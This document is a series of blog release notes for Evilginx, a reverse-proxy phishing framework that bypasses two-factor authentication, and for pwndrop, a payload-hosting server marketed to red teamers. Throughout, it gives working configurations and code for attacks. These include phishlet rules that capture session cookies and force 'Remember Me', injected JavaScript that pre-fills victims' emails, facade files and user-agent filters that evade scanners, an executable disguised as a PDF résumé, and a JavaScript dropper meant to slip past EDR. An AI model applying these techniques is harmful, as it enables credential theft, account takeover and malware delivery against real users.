Normally, if you generated a phishing URL from a given lure, it would use a hostname combining your phishlet hostname and the primary subdomain assigned to your phishlet. During assessments, most of the time the hostname doesn't matter much, but sometimes you may want to give it a more personalized feel.

That's why I wanted to do something about it and make the phishing hostname fully customizable for any lure. Since Evilginx runs its own DNS server, it can successfully respond to any DNS A request coming its way.

So now instead of being forced to use a phishing hostname of e.g. www.linkedin.phishing.com, you can change it to whatever you want like this.is.totally.not.phishing.com. Of course this is a bad example, but it shows that you can go totally wild with the hostname customization and you're no longer constrained by pre-defined phishlet hostnames. Just remember that every custom hostname must end with the domain you set in the config.

You can change a lure's hostname with the following command:

lures edit <id> hostname <your_hostname>

After the change, you will notice that links generated with get-url will use the new hostname.

User-Agent Filtering

This is a feature some of you requested. It allows you to filter requests to your phishing link based on the originating User-Agent header. Just set the ua_filter option for any of your lures to a whitelist regular expression, and only requests with a matching User-Agent header will be authorized.

As an example, if you'd like only requests from iPhone or Android to go through, you'd set a filter like so:

lures edit <id> ua_filter ".*(Android|iPhone).*"

HTTP & SOCKS5 Proxy Support

You can finally route the connection between Evilginx and the targeted website through an external proxy.

This may be useful if you want the connections to a specific website to originate from a specific IP range or geographical region. It may also prove useful for debugging your Evilginx connection and inspecting packets using the Burp proxy.

You can check all available commands on how to set up your proxy by typing in:

help proxy

Make sure to always restart Evilginx after you enable proxy mode, since it is the only surefire way to reset all already established connections.

IP Blacklist

If you don't want your Evilginx instance to be accessed from unwanted sources on the internet, you may want to add specific IPs or IP ranges to the blacklist. You can always find the current blacklist file in:

~/.evilginx/blacklist.txt

By default automatic blacklist creation is disabled, but you can easily enable it using one of the following options:

blacklist unauth

This will automatically blacklist the IPs of unauthorized requests. This includes all requests which did not point to a valid URL specified by any of the created lures.

blacklist on

This will blacklist the IP of EVERY incoming request, whether it is authorized or not, so use caution. This will effectively block access to any of your phishing links. You can use this option if you want to send out your phishing link and see if any online scanners pick it up.

If you want to add IP ranges manually to your blacklist file, you can do so by editing the blacklist.txt file in any text editor and adding the netmask to the IP:

134.123.0.0/16

You can also freely add comments by prepending them with a semicolon:

; this is a comment
18.123.45.0/24 ;another comment

New with_params Option for Phishlets

You can now make any of your phishlet's sub_filter entries optional and have them kick in only if a specific custom parameter is delivered with the phishing link.

You may, for example, want to remove or replace some HTML content only if a custom parameter target_name is supplied with the phishing link. This may allow you to add some unique behavior to proxied websites. All sub_filters with that option will be ignored if the specified custom parameter is not found.

You can add it like this:

sub_filters:
- {triggers_on: 'auth.website.com', orig_sub: 'auth', domain: 'website.com', search: '<body\s', replace: '<body style="visibility: hidden;" ', mimes: ['text/html'], with_params: ['target_name']}

This will hide the page's body only if target_name is specified. Later, the added style can be removed at any point through Javascript injected with js_inject, as shown below.
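
For illustration, a minimal sketch of mine of the script a js_inject entry could carry to flip that style back:

// Reveal the page body that the with_params sub_filter hid on load.
document.body.style.visibility = 'visible';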

Quality of Life Updates

I've also included some minor updates. There are some improvements to the Evilginx UI, making it a bit more visually appealing. I fixed some bugs I found along the way and did some refactoring. All the changes are listed in the CHANGELOG above.

Epilogue

I'm glad Evilginx has become a go-to offensive tool for red teamers simulating phishing attacks. It shows that it is not just a proof-of-concept toy, but a full-fledged tool which brings reliability and results during pentests.

I hope some of you will start using the new templates feature. I welcome all quality HTML template contributions to the Evilginx repository!

If you have any ideas/feedback regarding Evilginx or you just want to say "Hi" and tell me what you think about it, do not hesitate to send me a DM on Twitter.

Also please don't ask me about phishlets targeting XYZ website as I will not provide you with any or help you create them. Evilginx is a framework and I leave the creation of phishlets to you. There are already plenty of examples available, which you can use to learn how to create your own.

Happy phishing!

>> GET EVILGINX HERE <<


Find me on Twitter: @mrgretzky

Email: [email protected]

Pwndrop - Self-hosting Your Red Team Payloads

I have to admit, I took my sweet time to write this post and release this tool, but the time has finally come. I am finally ready to publish pwndrop, which has been in development for the last two years. It was rewritten from scratch once (Angular.js was not the right choice) and stalled for multiple months due to busy times at work.

The timing for the release isn't ideal, but at least I hope using pwndrop can help you get through these tough weeks/months.

Also stay at home, don't eat bats and do not burn any 5G antennas.

If you want to jump straight in and grab the tool, follow this link to Github:

pwndrop - Github

What is pwndrop?

Pwndrop is a self-deployable file hosting service for red teamers, allowing you to easily upload and share payloads over HTTP and WebDAV.


If you've ever wasted a whole evening setting up a web server just to host a few files and get that .htaccess file redirection working, fear no more. Your future evenings are safe from being wasted again!

With pwndrop you can set up your own on-premise file server. The features are specifically tailored for red teamers wanting to host their payloads, but the tool can also be used as a normal file sharing service. All uploaded files are accessible via HTTP, HTTPS and WebDAV.

Before jumping into the features present at release, I wanted to share some information on the tool's development process.

Under the hood

For a long time I wanted a self-hosted Dropbox, which would allow me to easily upload and share files with custom URL paths. There is of course Python's SimpleHTTPServer, which has a decent fanbase, but I badly wanted something with a web UI and a drag & drop interface, deployable with a single command. The idea was born. I knew I'd make the backend in Go, but I had no experience with any of the modern frontend libraries. It was 2018 back then, and I decided it would be a good opportunity to learn something new.

First came the idea of using Angular.js, since it is a very robust and well-supported framework. In the end, it turned out to be too bloated for my needs, and the amount of things I had to learn just to make a simple UI (I'm looking at you, TypeScript) was staggering. I managed to get a proof-of-concept version working and then scrapped the whole project to start anew, almost a year later.

You can see that I had absolutely no regrets killing off this monstrosity.

Then in 2019, a really smart and creative red teamer, Jared Haight @jaredhaight, released his C2 framework FactionC2 at TROOPERS19. I immediately fell in love with the web UI he made and, after chatting a bit with him, I learned he used Vue.js. Vue seemed lightweight, relatively new and already pretty popular, which made it a perfect choice. Thanks, Jared, for the inspiration!

I bought a Vue.js course on Udemy and in a few weeks I was ready to go. If you want to make a tool with a web interface, do check out Vue, as it may fit your needs as well.

For my own and your convenience, I got rid of all of the npm + webpack clutter to slim down the project as much as possible. When I found out that a small project like pwndrop requires 1000MB of preinstalled packages through npm init, the decision to put the project on a diet was made. I wanted to simplify working with the project as much as possible and cut out the unnecessary middleware. Even using webpack requires learning a ton about how to configure it, and I definitely didn't want to spend any extra time on that. Now the project doesn't take more than 70MB of precious hard drive space.

All in all, I've detached the frontend entirely from the build process, allowing the UI files to reside in their own folder, making them easily accessible for modifications and updates. The backend, on the other hand, is a single executable file, which installs itself and runs as a daemon in the background.

My main goal was to dumb down the installation process to the greatest extent and I'm pretty proud of the outcome. The whole project has ZERO dependencies and can be installed as easily as copying the precompiled files to your server and entering a single command to install and launch the server.

Let's now jump into the most important part - the features!

Features

Here is the list of features you can use from the get-go in the release version.

Drag & drop uploading of files

Easily drag & drop your files onto pwndrop admin panel to upload them.


Works on mobile

Since the UI is made with Bootstrap, I made sure it is responsive and looks good on every device.

A fun way to use pwndrop on your phone is to take photos with the phone's camera through the admin panel; they will be automatically uploaded to your server.

Share files over HTTP, HTTPS and even WebDAV

The best part of pwndrop is that it is not just an ordinary web server. My main focus was to also support serving files over WebDAV, which is used for pulling 2nd-stage payloads through a variety of different methods.

You can even use it with your l33t "UNC Path 0-days" ;)

In the future I plan to also add support for serving files over SMB. This will also make it possible to capture Net-NTLMv2 hashes from the machines making the request.

Click any of the "copy link" buttons to get a shareable link in your clipboard.


Enable and disable your file downloads

You can enable or disable a file's ability to be downloaded with a single click. Disabled files will return a 404 or follow the pre-configured redirection when requested.


Set up facade files to return a different file from the same URL

Each uploaded file can be set up with a facade file, which will be served when a facade is enabled.

For example, you may want to share a link to a Word document with your custom macro payload, but you don't want your macro to be analyzed by online scanners as soon as you paste the link. To protect your payload, you can upload a clean facade document under your payload file.

When facade mode is enabled, all online scanners requesting the file will receive your clean facade file. This can give you a brief window of evading detection. To have your link return the payload file, you need to manually disable facade mode.


Create custom URL paths without creating directories

You can set whatever URL path you want for your payloads and pwndrop will always return a file when that URL is reached. There is no need to put files into physical directories.

By default, the tool will put every uploaded file under a randomly generated subdirectory. You can easily change it in the uploaded file's settings.


URL redirects to spoof file extension

Let's say you want to have a shared link pointing to /download/Salary Charts 2020.docx, but after the user clicks it, it should download an HTA payload, Salary Charts 2020.docx.hta, instead.

Normally you'd have to write some custom .htaccess files to use with Apache's mod_rewrite or fight with nginx configuration files.

With pwndrop you just need to specify the URL path the file should automatically redirect to.


I will describe the whole setup process in the Quickstart section below.

Change MIME types

In most setups, the web server decides the MIME type of the downloaded file. This tells the web browser what to do with the file once it is downloaded.

For example a file with text/plain MIME type will be treated as a simple text file and will be displayed in the browser window. The same text file with application/octet-stream MIME type will be treated as a binary file and the browser will save it to a file on disk.


This allows for some interesting manipulation, especially with MIME type confusion exploits.

You can find the list of common MIME types here.


Automatic retrieval of TLS certificates from LetsEncrypt

Once you install pwndrop and point your domain's DNS A records to it, the first attempted HTTPS connection to pwndrop will initiate an automatic retrieval of a TLS certificate from LetsEncrypt.

Secure connections should work out of the box, but do check the readme on Github to learn more about setting it up, especially if you want to use the tool locally or without a domain.

Password protected and hidden admin panel

I wanted to make sure that the admin panel of pwndrop is never visible to people who are not meant to see it. Being in full control of the web server, I was able to completely lock down access to it. If the viewer's web browser does not have the proper authorization cookie, pwndrop will either redirect to a predefined URL or return a 404.

In order to authorize your browser, you need to open a secret URL path on your pwndrop domain. The default path is /pwndrop and should be changed in the settings as soon as the tool is deployed to your server.

Remember to change Secret Path to something unique

If you want to re-lock access to the admin panel, just change the Secret-Cookie name or value; you will then need to visit the Secret-Path again in order to regain access.

Quickstart

Now that I've hopefully managed to highlight all of the features, I want to give you a rundown of how to set up your first uploaded file with a facade and redirection.

Goal: Host our payload.exe payload and disguise it as the shared link https://www.evilserver.com/uploads/MyResume.pdf. The payload file will be delivered through redirection as MyResume.pdf.exe. The MyResume.pdf file will be set up as a facade file and will be served as a legitimate PDF if facade mode is enabled, in order to temporarily hide the payload's true form from online scanners.

Here we go.

0. Deployment

If you don't yet have a server to deploy pwndrop to, I highly recommend Digital Ocean. The cheapest $5/mo Debian 9 server with 25GB of storage space will work wonders for you. You can use my referral link to get an extra $100 to spend on your servers within 60 days, for free.

I won't be covering the deployment process of pwndrop here on the blog as it may get outdated at some point. Instead check out the always up-to-date README with all the deployment instructions on Github.

If you are in a hurry, though, you can install pwndrop on Linux with a single command:

curl https://raw.githubusercontent.com/kgretzky/pwndrop/master/install_linux.sh | sudo bash

1. Upload your payload executable file

Make sure you authorize your browser first, by opening: https://<yourdomain.com>/pwndrop

Then open https://<yourdomain.com> and follow the instructions on the screen to create your admin account.

IMPORTANT! Do not forget to change the Secret-Path from /pwndrop to something of your choice in the settings.

Use the Upload button or drag & drop payload.exe onto pwndrop to upload your payload file.


2. Upload your PDF facade file

Click the top-left cog icon on your newly uploaded file and the settings dialog will pop out.

Click the facade file upload area or directly drop MyResume.pdf file onto it.


3. Set up redirection

Now you need to change the Path to what it should look like in your shared link. We want it to point to MyResume.pdf so change it to, say: /uploads/MyResume.pdf (you can choose whatever path you want).

Then click the Copy button on the right side of the Redirect Path editbox; it will copy the contents of the Path editbox to the editbox below.

Just add .exe to the copied path, making it /uploads/MyResume.pdf.exe. This will be the path pwndrop redirects to in order to serve the payload executable after the user clicks the shared link.

Keep in mind that the redirection will only happen when facade mode is disabled. When facade mode is enabled, pwndrop will serve the facade PDF file instead, not triggering any red flags.

We will also change the MIME type of the facade file, which will show you the power of this feature. While serving the PDF facade file with the application/x-msdownload MIME type is valid, the Chrome browser will initiate a download when the shared link is clicked. If you change the MIME type to application/pdf, though, Chrome will open a preview of the PDF file, as it knows it is dealing with a PDF.

Depending on what effect you want to achieve, either having the user download the PDF or having it previewed in the web browser, you can play with the different options.


Don't forget to click Save once you're finished with setting up the file.

4. Sharing your file

Now you're done. You can get the HTTP shared link by clicking the HTTP button. The http:// or https:// prefix will be picked based on how you're currently browsing the admin panel. Similarly, if you click the WebDAV button, you will get the WebDAV link copied to your clipboard.


If you ever decide you want to temporarily disable sharing for this file, just click the power button; it will effectively hide the file, and links to it will stop working.


The next important thing is enabling the facade. Just click the third button from the left to flip the switch that enables or disables facade mode. When facade mode is enabled, pwndrop will serve the facade file you've uploaded for the given payload, instead of the original payload file. In our example it will deliver the PDF file instead of the payload executable.


Aaand that's it. Enjoy your first shared payload! Hope I've managed to not make the process too complex and that it was pretty easy to follow.

Future Development

I have a lot of ideas I want to implement in pwndrop, but instead of never releasing the tool and endlessly adding features because "it is never quite perfect yet", I've decided to release it as it is now. I will iteratively expand on it, adding new features from time to time.

So before you send me your feedback, check out what I plan to implement in the near and far future. I really want to hear what features you'd like to see and how you'd want to use the tool.

Download Counter

This one should be implemented quite fast. It would add a download counter for each file, specifying the number of times the file is allowed to be downloaded. When the limit is reached, pwndrop will either serve the facade file or return a file-not-found response.

Download Tracker

This feature is much needed, but requires a bit of work. I want to add a separate view panel, which will display, in real time, all download requests for every payload file. The log should contain the visitor's User-Agent, IP address and some additional metadata that can be gathered from the particular request.

File dropping with Javascript

There is a method to initiate a file download directly through Javascript executed on an HTML page. It is an effective method for bypassing the request scanners of several EDRs.

The idea is that the whole payload file gets embedded into an HTML page as an encrypted blob, which is then decrypted in real time and served as a download to the web browser. That way there is never a direct request made to a file resource with a specific URL, meaning there is nothing to download and scan. EDRs would have to implement Javascript emulation engines in order to execute the dropper script in a sandbox and analyze the decrypted payload.
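
A bare-bones sketch of mine of that dropper technique; the decryption step is omitted, and the byte array and filename are placeholders:

// Hand the embedded, already-decrypted bytes to the browser as a download.
// No request to a file URL is ever made, so there is nothing to scan in transit.
function dropFile(decryptedBytes, filename) {
  var blob = new Blob([decryptedBytes], { type: 'application/octet-stream' });
  var a = document.createElement('a');
  a.href = URL.createObjectURL(blob);
  a.download = filename; // forces a "save file" action instead of navigation
  document.body.appendChild(a);
  a.click();
  URL.revokeObjectURL(a.href);
  a.remove();
}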

Conditional facades

At the moment, facade mode can only be enabled or disabled manually, but eventually I'd like this process to be somewhat automated. Pwndrop could check if the request is made with a specific cookie or User-Agent, or comes from a targeted IP range, and then decide whether to serve the payload file or the facade file instead.

Password protected downloads

Sometimes it is good to share a file which downloads only after a valid password is entered. This is a feature I'd also like to have in pwndrop. I'm not yet sure if it should be done with basic HTTP authentication or something custom. Let me know if you have any ideas.

The End (for now!)

This is only the end of this post, but definitely not the end of pwndrop's development. I'd really like to see how you, the red teamers, plan to use this tool and how it can aid you in managing your payloads.

I also hope that you can use this tool not only for work. I hope it helps you share any files you want with the people you want, without having to worry about privacy and/or security issues. Self-hosting is always the best way to go.

Expect future updates on this blog and if you have any feedback you want to share, do contact and follow me on Twitter @mrgretzky.

Get the latest version of pwndrop here:

Enjoy and I'm waiting for your feedback!

Evilginx 2.3 - Phisherman's Dream

Welcome to 2019!

As was noted, this will be the year of phishing automation. We've already seen the release of the new reverse-proxy tool Modlishka, and it is only January.

This release would not have happened without the inspiration I received from Michele Orru (@antisnatchor), Giuseppe Trotta (@Giutro) and Piotr Duszyński (@drk1wi). Thank you!

This is by far the most significant update since the release of Evilginx. The 2.3 update makes it unnecessary to manually create your own sub_filters. I talked to many professional red teamers (hello @_RastaMouse) who struggled with creating their own phishlets because of the unfairly steep learning curve of figuring out what strings to replace, and where, in the proxied HTTP content. I can proudly say that these days are over and it should now be much easier to create phishlets from scratch.

If you arrived here by accident and have no idea what I'm talking about, check out the first post on Evilginx. It is a phishing framework acting as a reverse proxy, which allows bypassing two-factor authentication.

Let's jump straight into the changes.

Changelog - version 2.3

Here is a full list of changes in this version:

  • Proxy can now create most of required sub_filters on its own, making it much easier to create new phishlets.
  • Added lures, with which you can prepare custom phishing URLs, each having its own set of unique options (help lures for more info).
  • Added OpenGraph settings for lures, allowing to create enticing content for link previews.
  • Added ability to inject custom Javascript into proxied pages.
  • Injected Javascript can be customized with attacker-defined data, specified in lure options.
  • Deprecated landing_path and replaced it with a login section, which contains the domain and path for website's login page.

Diving into more detail now.

Automatic handling of sub_filters

In order for Evilginx to properly proxy a website, it must not stray off its path and it should make sure that all proxied links and redirections are converted from original URLs to the phishing URLs. If the browser navigates to the original URL, the user will no longer be proxied through Evilginx and the phishing will simply fail.

I am aware it was super hard to manually figure out which strings to replace, and that it took considerable amounts of time to analyze the HTML content of every page and manage substitutions using the trial-and-error method.

Initially I thought that automatic URL substitution in the page body would just not work well. The guys I mentioned at the top of this post proved me wrong, and I was amazed at how well it can work when properly executed. When I saw this method successfully implemented and demonstrated in Modlishka, I was blown away. I knew I had to try and do the same for Evilginx.

It took me a whole weekend to implement the required changes and I'm very happy with the outcome. You can now start creating your phishlet without any sub_filters at all. Just define the proxy_hosts for the domains and subdomains that you want to proxy through and it should work out-of-the-box. You may need to create your own sub_filters only if there is some unusual substitution required to bypass security checks or you just want to modify some HTML to make the phishing scenario look better.

The best thing about automated sub_filter generation is that the whole website's functionality may fully work through the proxy, even after the user is authenticated (e.g. Gmail's inbox).

Phishing with lures

The tokenized phishing link with its base64-encoded redirection URL was pretty ugly and definitely not perfect for carefully planned phishing attacks. As an improvement, I thought of creating custom URLs with attacker-defined paths, each assigned a different redirection URL to navigate to on successful authentication through the phishing proxy. This idea eventually surfaced in the form of lures.


You can now create as many lures as you want for specific phishlets, and you are able to give each of them the following options:

  • A custom path to make your phishing URLs look more inviting to click.
  • A redirection URL to navigate the user to after they successfully authenticate.
  • OpenGraph features, which will inject <og:...> meta tags into the proxied website to make the phishing links generate enticing previews when sent in messengers or posted to social media.
  • Customized script content, which will be embedded into your injected Javascript code (e.g. for pre-filling the user's email address).
  • A description for your own eyes, so you don't forget what the lure was for.

Here is how OpenGraph lure configuration can be used to generate an enticing preview for WhatsApp:


On clicking the link, the user will be taken to the attacker-controlled proxied Google login page and, on successful authentication, they can be redirected to any document hosted on Google Drive.

The command for generating tokenized phishing links through phishlets get-url still works, although I'd consider it obsolete now. You should generate phishing URLs with pre-created lures instead: lures get-url 0

To get more information on how to use lures, type in help lures and you will get a list of all sub-commands you can use.

Javascript injection

Now you can inject any Javascript code into the proxied HTML content, based on the URL path or domain. This gives you incredible capabilities for customizing your phishing attack. You could, for example, make the website pre-fill the email of your target in the authentication form and display their profile photo.

Here is an example of injected Javascript that pre-fills the target's email on the LinkedIn login page:

js_inject:
  - trigger_domains: ["www.linkedin.com"]
    trigger_paths: ["/uas/login"]
    trigger_params: ["email"]
    script: |
      function lp(){
        var email = document.querySelector("#username");
        var password = document.querySelector("#password");
        if (email != null && password != null) {
          email.value = "{email}";
          password.focus();
          return;
        }
        setTimeout(function(){lp();}, 100);
      }
      setTimeout(function(){lp();}, 100);

You can see that the email value is set to {email}, which lets Evilginx know that it should be replaced with the value set in the created lure. Setting the email value is done the following way:

: lures edit params 0 [email protected]

Note that the trigger_params variable contains the email value, which means this Javascript will ONLY be injected if the email parameter is configured in the lure used in the phishing attack.

Here is a demo of what a creative attacker could do with Javascript injection on Google, pre-filling their target's details for them:


Removal of landing_url section

To upgrade your phishlets to version 2.3, you have to remove the landing_url section and replace it with a login section.

I figured you may want to use a different domain for your phishing URL than the one used to display the login page. For example, Google's login page is always at the accounts.google.com domain, but you may want the phishing link to point to a different sub-domain, like docs.phished-google.com. That way you can add docs.google.com to proxy_hosts and set its is_landing option to true.

The login section should contain:

login:
  domain: 'accounts.google.com'
  path: '/signin/v2/identifier'

IMPORTANT! The login section always defines where the login page resides on the targeted website.

That way the user will be automatically redirected to the login page domain even when the phishing link originated on a different domain.

Refer to the official phishlets 2.3.0 documentation for more information.

Have fun!

I can proudly say that the phishlet format is now close to being perfect and, since the difficulty of creating one from scratch has dropped significantly, I will be starting a series of blog posts teaching how to create a phishlet from scratch, including how to configure everything.

The series will start very soon and the posts will be written in a hands-on, step-by-step format, showing the whole process of phishlet creation from start to finish, for a website that I pick.

Make sure to follow me on Twitter if you want up-to-date information on Evilginx development.

[Follow me on Twitter](https://twitter.com/mrgretzky)
[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

Evilginx 2.2 - Jolly Winter Update

Tis the season to be phishing!

I've finally found some free time and managed to take a break to work on preparing a treat for all of you phishing enthusiasts out there. Just in time for the upcoming holiday season, I present you the chilly Evilginx update.

[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

If you've arrived here by accident and have no idea what I'm writing about, do check the first post about Evilginx 2 release.

Without further ado, let's jump straight into the changelog!

Changelog - version 2.2

First, here is a full list of changes made in this version.

  • Added option to capture custom POST arguments additionally to credentials. Check custom field under credentials.
  • Added feature to inject custom POST arguments to requests. Useful for silently enabling "Remember Me" options, during authentication.
  • Restructured phishlet YAML config file to be easier to understand (phishlets from previous versions need to be updated to new format).
  • Removed name field from phishlets. Phishlet name is now determined solely based on the filename.
  • Now when any of auth_urls is triggered, the redirection will take place AFTER response cookies for that request are captured.
  • Regular expression groups working with sub_filters.
  • Phishlets are now listed in a table.
  • Phishlet fields are now selectively lowercased and validated upon loading to prevent surprises.
  • All search fields in the phishlet are now regular expressions by default. Remember about proper escaping!

Now for the details.

Added option to capture custom POST arguments

You can now capture additional POST arguments in requests. Some people mentioned they often need to capture data from other fields like PINs or tokens. Now you can.

Captured field values can be viewed in captured session details.


Find out how to specify custom fields for capture in the official documentation.

Added feature to inject custom POST arguments to requests. Useful for silently enabling "Remember Me" options during authentication

Almost all websites provide an option to log in without permanently remembering the logged-in user. This results in the website storing only temporary session cookies, or cookies with a short lifespan, which are later invalidated both on the server and the client.

Capturing session cookies in such a scenario does not give the attacker permanent access. This is why it is most important that the phished user ticks the "Remember Me" checkbox to inform the server that persistent authentication is requested. Until now, that decision rested on the phished user's shoulders.

In this version it is now possible to inject an argument into the POST request to inform the server that the "Remember Me" checkbox was ticked (even though it could've been deliberately left unchecked).

As an example, this part of a phishlet will detect the login POST request containing the username and password fields, and will add or replace the remember_me parameter to always have a value of 1:

force_post:
  - path: '/sessions'
    search:
      - {key: 'session\[user.*\]', search: '.*'}
      - {key: 'session\[pass[a-z]{4}\]', search: '.*'}
    force:
      - {key: 'remember_me', value: '1'}
    type: 'post'

Play around with it - I'm sure this feature has other uses that I haven't thought of yet.

Remade phishlet YAML file format

In preparation for a final version of the phishlet file format, I did some restructuring. You will need to make some minor modifications to your custom phishlets to make them compatible with Evilginx 2.2.0.

I've now also properly documented the new phishlet file format, so please get familiar with it here:
Phishlet File Format 2.2.0 Documentation

Removed name field from phishlets

Many of you reported proxy returning TLS errors when testing your own custom phishlets. They were caused by custom phishlets having the same name as another loaded phishlet.

That name field caused enough confusion, so I decided to remove it altogether. The phishlet name is now solely determined by the phishlet filename, without the .yaml suffix. This guarantees a unique name for each phishlet, as two identical filenames can't exist in the directory from which phishlets are loaded.

Now when any of auth_urls is triggered, the redirection will take place AFTER response cookies for that request are captured

In previous versions, whenever any of the auth_urls triggered the session capture, the redirection would happen immediately, before Evilginx could parse the response received from the server.

This meant Evilginx could not parse and capture cookies returned in the response to that final request - the one triggering the session capture and redirection.

This has now changed: you can safely pick a trigger URL path that still returns session cookies in the response, as they will be captured and saved before the redirection happens.

Regular expression groups working with sub_filters

I've been asked about this recently and, upon checking, I realized it has been supported since the initial Evilginx 2 release.

You can define a regular expression group, as you'd normally do, with parentheses in the search field, and later refer to it in the replace field with ${1}, where 1 is the group index. You can naturally use more than one group.

Example:

  - {triggers_on: 'www.linkedin.com', orig_sub: 'cdn', domain: 'linkedinapis.com', search: '//{hostname}/([0-9a-z]*)/nhome/', replace: '//{hostname}/${1}/nhome/', mimes: ['text/html', 'application/json']}

Refer to GO language documentation to see exactly how it works (make sure to see the example section):
https://golang.org/pkg/regexp/#Regexp.ReplaceAllString

Phishlets are now listed in a table

Simply put - the phishlet listing was an ugly mess. Now it looks good.


Phishlet fields are now selectively lowercased and validated upon loading to prevent surprises

Evilginx will now validate each phishlet on loading. It will try its best to inform you about any detected issues with an error message, to make it easier to debug accidental mistakes like typos or missing fields.

All search fields in the phishlet are now regular expressions by default

The phishlet documentation now specifies which fields are considered regular expressions, so remember to properly escape your regular expression strings.

As a quick example, if you used to look for the login.username POST key to capture its value, you now need to define the field as key: 'login\.username', because . is one of the special characters in regular expressions and has a meaning of its own.
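As a sketch, using the user_regex structure shown in the 2.1 release notes further down this page (the restructured 2.2 format may place this differently - check the documentation linked above):

user_regex:
  key: 'login\.username'  # '.' escaped, since search fields are regular expressions
  re: '(.*)'              # capture the entire submitted value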

Enjoy!

As always, I wanted to thank everyone for amazing feedback and providing ideas to improve Evilginx.

Keep the bug reports and feature requests incoming!

[Follow me on Twitter](https://twitter.com/mrgretzky)
[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

Evilginx 2.1 - The First Post-Release Update

About 2 months ago, I released Evilginx 2. Since then, a lot of you have reported issues or wished for specific features.

Your requests have been heard! I've finally managed to find some time during the weekend to address the most pressing matters.

[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

Here is what has changed and how you can use the freshly baked features.

Changelog - version 2.1

Developer mode added

It is finally much easier to develop and test your phishlets locally. Start Evilginx with the -developer command-line argument and it will switch itself into developer mode. In this mode, instead of trying to obtain LetsEncrypt SSL/TLS certificates, it will automatically generate self-signed certificates.

Evilginx will generate a new root CA certificate when it runs for the first time. You can find the CA certificate at $HOME/.evilginx/ca.crt or %USERPROFILE%\.evilginx\ca.crt. Import this certificate into your certificate storage as a trusted root CA and your browsers will trust every certificate generated by Evilginx.

Since this feature allows for local development, there is no need to register a domain with a domain registrar. Just use any domain you want and set the server IP to 127.0.0.1 or your LAN IP:

config domain anydomainyouwant.com
config ip 127.0.0.1

It is important that your computer redirects all connections to the phishing hostnames to your local IP address. To do that, you need to modify the hosts file.

First, generate the hosts redirect rules with Evilginx for the phishlet you want:

: phishlets hostname twitter twitter.anydomainyouwant.com
: phishlets get-hosts twitter

127.0.0.1 twitter.anydomainyouwant.com
127.0.0.1 abs.twitter.anydomainyouwant.com
127.0.0.1 api.twitter.anydomainyouwant.com

Copy the command output and paste it into your hosts file. The hosts file can be found at:
Linux: /etc/hosts
Windows: %WINDIR%\System32\drivers\etc\hosts

Remember to enable your phishlet and you can start using Evilginx locally (can be useful for demos too!).

Authentication cookie detection was completely rewritten

There were some limitations in the initial implementation of session cookie detection, so I rewrote a significant portion of its code. Now, Evilginx is able to detect and properly use httpOnly and hostOnly flags, as well as path values for each captured cookie.

IMPORTANT! Previously captured sessions will not load properly with latest version of Evilginx, so make sure you backup your captured sessions before updating.

Evilginx will now properly handle cookie domains .anydomain.com vs anydomain.com. This is very important, as I've noticed during testing that imported cookies will not provide a working session if the cookie domain is set improperly.

The difference is that a cookie set for domain .anydomain.com will be sent with requests to anydomain.com and also to any of its sub-domains (e.g. auth.anydomain.com), while a cookie set for domain anydomain.com will be sent only with requests to anydomain.com.

I also had to update the current phishlets to properly detect cookie domain names (with or without the . prefix), so you may need to update your private ones accordingly.
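For example, the two domain forms would look like this in a phishlet (cookie names here are hypothetical):

auth_tokens:
  - domain: '.anydomain.com'  # leading dot: cookie valid for the domain and all its sub-domains
    keys: ['session_id']
  - domain: 'anydomain.com'   # no dot: cookie valid only for this exact host
    keys: ['host_session']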

Regular expressions for cookie names and POST key names

It has come to my attention that some websites dynamically generate cookie names or POST key names, based on user ID or other factors. Since Evilginx could only look for fixed names, it would never be able to properly capture such cookies or intercept a username/password field in a POST request.

Now you can enter regular expressions for both cookie names and the POST user_regex and pass_regex, by appending regexp to the string after a comma (,) separator.

Here is an example. Let's say we want to capture a cookie named session_user_738299, where 738299 is the user ID, which will be different for every user and thus a dynamic value. We can set up capturing of this cookie with regular expressions like this (assuming the numerical value is always 6 digits):

auth_tokens:
  - domain: '.anydomain.com'
    keys: ['session_user_[0-9]{6},regexp']

This can also be done for POST keys. If we need to intercept a POST key that will hold a username, named user[session_id_36273], we can do:

user_regex:
  key: 'user\[session_id_.*\],regexp'
  re: '(.*)'

The same applies to pass_regex, of course.
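For completeness, the pass_regex counterpart of the example above could look like this (the key name is hypothetical, mirroring the user_regex example):

pass_regex:
  key: 'pass\[session_id_.*\],regexp'
  re: '(.*)'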

URL path detection for triggering session capture

You will find websites that set the session cookie ID before you even start typing your email into the login form. In such cases, Evilginx would detect the session cookie, capture it and, since it was the last cookie it was meant to capture, consider the session captured - even though no credentials had been entered yet.

As smart people pointed out on GitHub, this can be remedied by detecting an HTTP request to a specific URL path that happens only after the user has successfully authenticated (e.g. /home).

Now you can add a new parameter to your phishlet, auth_urls, where you provide an array of URL paths that will trigger the session capture. If we wanted to look for an HTTP request to /home, we could set it up like this:

auth_urls:
  - '/home'

With auth_urls set up in the phishlet, Evilginx will not trigger a session capture even when it considers all session cookies captured. The cookies will be stored only after an HTTP request to any of the specified URL paths happens.

IMPORTANT! URL paths in auth_urls are all considered regular expressions, so proper escaping may be required (there is no need to add ,regexp to each string).
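For instance, both a static path and a path with a dynamic segment can be matched (the second entry is hypothetical):

auth_urls:
  - '/home'
  - '/user/[0-9]+/welcome'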

There is now a cool trick that utilizes both the auth_urls feature and regular expressions for cookie names.

If you ever come across a website that issues cookies in a way that makes their names impossible to pin down with regular expressions, you can just opt for capturing all cookies for a given domain and waiting for the URL trigger.

This is how you'd do it:

auth_tokens:
  - domain: '.anydomain.com'
    keys: ['.*,regexp'] # captures all cookies for that domain
auth_urls:
  - '/home' # saves all captured cookies when this request is made

This is a very messy approach and I'd prefer not to see phishlets rely on it too much, but it can be done.

Empty subdomains now work

There was a bug that prevented phishlets from working for websites that do not use any subdomain for some of their hostnames. This is no longer an issue and, as an example to prove that it is fixed, I've slightly modified the twitter phishlet to work with the twitter.com hostname.

Wrapping up

Keep posting the issues you run into when creating your own phishlets, as I'm sure there will still be scenarios that require adjustments to Evilginx.

You can update by pulling the latest changes from the master branch. I will post a binary release once I confirm that everything is stable.

[Follow me on Twitter](https://twitter.com/mrgretzky)
[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

I still have some nice ideas for upcoming releases, like dynamic custom Javascript injection and forcing "Remember Me" checkboxes by POST parameter injection.

Hope you are liking Evilginx so far.

Enjoy this update!

